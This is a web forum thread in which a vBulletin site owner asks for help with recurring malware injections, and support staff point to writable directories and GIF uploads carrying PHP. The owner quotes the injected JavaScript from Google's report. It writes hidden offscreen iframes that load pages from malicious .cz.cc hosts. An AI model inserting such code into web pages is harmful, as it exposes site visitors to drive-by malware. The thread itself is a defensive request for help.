Results 1 to 6 of 6
Like Tree2Likes
  • 1 Post By Mert Gökçeimam
  • 1 Post By Brian Cummiskey

Anyone here experience with malware injection attacks?

This is a discussion on Anyone here experience with malware injection attacks? within the Off-Topic & Chit Chat forums, part of the Focus on Members category; Our site is now more than half a year plagued by malware injections, and I feel like I tried everything ...

  1. #1
    Senior Member
    Real Name
    ---
    Join Date
    Oct 2005
    Location
    Belgium
    Posts
    822
    Liked
    1 times

    Anyone here experience with malware injection attacks?

    Our site is now more than half a year plagued by malware injections, and I feel like I tried everything to get rid of them. It used to be a few attacks every week, but now users see Google warnings on several pages constantly.

    Our site: ****

    This is what Google WMT says:

    /clientscript/vbulletin_global.js?v=386 - Details 04-05-11
    /clientscript/vbulletin_post_loader.js?v=386 - Details 23-04-11
    Suspected injected code Instances
    document.write('<style>.irybbb3ngg { position:absolute; left
    :-1286px; top:-1877px} </style> <div class="irybbb3ngg"><ifr
    ame src="http://mesyldureefz.cz.cc/8afcmtjs/counter.php?id=2
    "></iframe></div>');
    Suspected injected code Instances
    document.write('<style>.px7awd { position:absolute; left:-18
    87px; top:-1869px} </style> <div class="px7awd"><iframe src=
    "http://ticlili31.cz.cc/myi986px/counter.php?id=2"></iframe>
    </div>');
    I disabled all plugins including vbseo two days ago, but members reported new warnings today so my guess is it's either a leak in vbulletin or somehow our server got hacked.

    The thing is that I already changed passwords for our server and scripts several times and all computers connecting to the server are also secure. Any help is very much appreciated.

  2. #2
    vBSEO.com Webmaster Mert Gökçeimam's Avatar
    Real Name
    Lizard King
    Join Date
    Oct 2005
    Location
    Istanbul, Turkey, Turkey
    Posts
    23,100
    Liked
    622 times
    Blog Entries
    4
    Hello ,

    You need to make sure your chmod 777 directories are protected and users are not uploading various gif images that include php scripts inside them. You can check Google redirecting to filestore123.info on how to protect your chmod 777 directories
    Last edited by Mert Gökçeimam; 05-04-2011 at 12:15 PM.
    dutchbb likes this.
    Mert Gökçeimam / Crawlability Inc.

    vBSEO 3.6.0 Alpha Önizlemesi - Including Like Tree
    Unveiling the NEW vBSEO Sitemap Generator 3.0 - available NOW for vBSEO Customers!


    Twitter:@Depkac
    Personal Blog : Mert Gökçeimam

  3. #3
    Senior Member
    Real Name
    ---
    Join Date
    Oct 2005
    Location
    Belgium
    Posts
    822
    Liked
    1 times
    Quote Originally Posted by Mert Gökçeimam View Post
    Hello ,

    You need to make sure your chmod 777 directories are protected and users are not uploading various gif images that include php scripts inside them. You can check Google redirecting to filestore123.info on how to protect your chmod 777 directories
    Ok thank you Mert, I'll try that, sounds like something that could cause this. But isn't this a major security flaw in vbulletin then?
    Last edited by Mert Gökçeimam; 05-04-2011 at 12:14 PM.

  4. #4
    vBSEO Staff Brian Cummiskey's Avatar
    Real Name
    Brian Cummiskey
    Join Date
    Jul 2009
    Location
    btwn NYC and Boston
    Posts
    12,789
    Liked
    657 times
    Blog Entries
    2
    I've edited out your name.


    The issue is not with vb, but with folder & file security.
    dutchbb likes this.
    Brian Cummiskey / Crawlability Inc.
    Security vbulletin - Patch Level for all supported versions released!

    Unveiling the NEW vBSEO Sitemap Generator 3.0. - available NOW for vBSEO Customers!


  5. #5
    vBSEO.com Webmaster Mert Gökçeimam's Avatar
    Real Name
    Lizard King
    Join Date
    Oct 2005
    Location
    Istanbul, Turkey, Turkey
    Posts
    23,100
    Liked
    622 times
    Blog Entries
    4
    Actually it is related with vBulletin also as vBulletin should make sure uploaded gif files doesn't have any malware inside. You can disable gif image upload also to get more security.
    Mert Gökçeimam / Crawlability Inc.

    vBSEO 3.6.0 Alpha Önizlemesi - Including Like Tree
    Unveiling the NEW vBSEO Sitemap Generator 3.0 - available NOW for vBSEO Customers!


    Twitter:@Depkac
    Personal Blog : Mert Gökçeimam

  6. #6
    Senior Member
    Real Name
    ---
    Join Date
    Oct 2005
    Location
    Belgium
    Posts
    822
    Liked
    1 times
    Thanks.

    I have uploaded the htaccess protection and deleted some gifs.

    Hopefully this will solve it, other suggestions are welcome.

Similar Threads

  1. Preventing ads from serving malware to visitors
    By Johnny5 in forum Ad Networks
    Replies: 1
    Last Post: 12-08-2010, 02:10 AM
  2. xss injection question
    By dascrow in forum General Discussion
    Replies: 6
    Last Post: 12-11-2009, 01:52 PM
  3. Redid my DevilsOwn water Injection again :)
    By rocket468 in forum Critique Please
    Replies: 3
    Last Post: 06-01-2009, 12:34 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •